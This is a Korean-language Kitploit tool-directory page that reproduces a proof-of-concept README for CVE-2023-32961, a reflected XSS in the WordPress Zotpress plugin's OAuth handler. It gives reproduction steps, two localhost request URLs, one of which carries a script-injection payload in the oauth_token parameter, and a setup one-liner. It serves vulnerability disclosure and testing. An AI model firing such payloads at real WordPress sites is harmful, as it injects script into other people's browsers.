Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-32961 — CVE-2023-32961의 PoC | Kitploit
도구/GitHubGitHub/lourc0d3/cve-2023-32961
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHublourc0d3/cve-2023-32961

CVE-2023-32961

CVE-2023-32961의 PoC

저장소 보기
2113년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-32961

이 저장소는 Wordpress Zotpress 플러그인의 XSS 취약점에 관한 것입니다.

구성 요소 세부 정보


구성 요소 이름

Zotpress

취약한 버전

≤ 7.3.3

구성 요소 슬러그

zotpress

구성 요소 링크

https://wordpress.org/plugins/zotpress/

사전 요구 사항


인증되지 않음

취약점 세부 정보


짧은 설명

zotpress/lib/admin/admin.accounts.oauth.php의 get_request_token 함수는 XSS 공격에 취약합니다.

재현 방법 (PoC)

  1. oauth php 확장을 설치하여 취약점을 트리거합니다. (Zotpress의 선택 사항입니다)
  2. zotero.org에 로그인합니다
  3. get_request_token 함수가 실행되기 위한 조건이 충족되어야 합니다. (처음 한 번만) 다음과 같은 페이로드를 전송합니다: http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token=1
  4. 아래 페이로드를 전송합니다 http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token="><script>alert(1)</script>

추가 정보

  • zotero.org 계정이 필요합니다.

  • 이를 트리거하려면 oauthState 값을 1로 설정해야 합니다. 위 페이로드가 작동하지 않으면 oauthState를 1로 설정할 방법을 찾아야 합니다.

    • 조건식 :

      root@kitploit:~
      $_GET['oauth_token'] != $state['request_token_info']['oauth_token']
      
  • php oauth 확장 설치가 용이함:

    • 한 줄 명령어 :

      root@kitploit:~
      sudo su; apt-get update; apt-get -y install gcc make autoconf libc-dev pkg-config libpcre3-dev; pecl install oauth; bash -c "echo extension=oauth.so > $PHP_INI_DIR/conf.d/oauth.ini"; service apache2 restart
      
  • wordpress:latest Docker 이미지에서 테스트되었습니다.

PoC 동영상

https://www.youtube.com/watch?v=5kZ7bNbs_-Q

참고 자료


CVE-2023-32961

도구 다운로드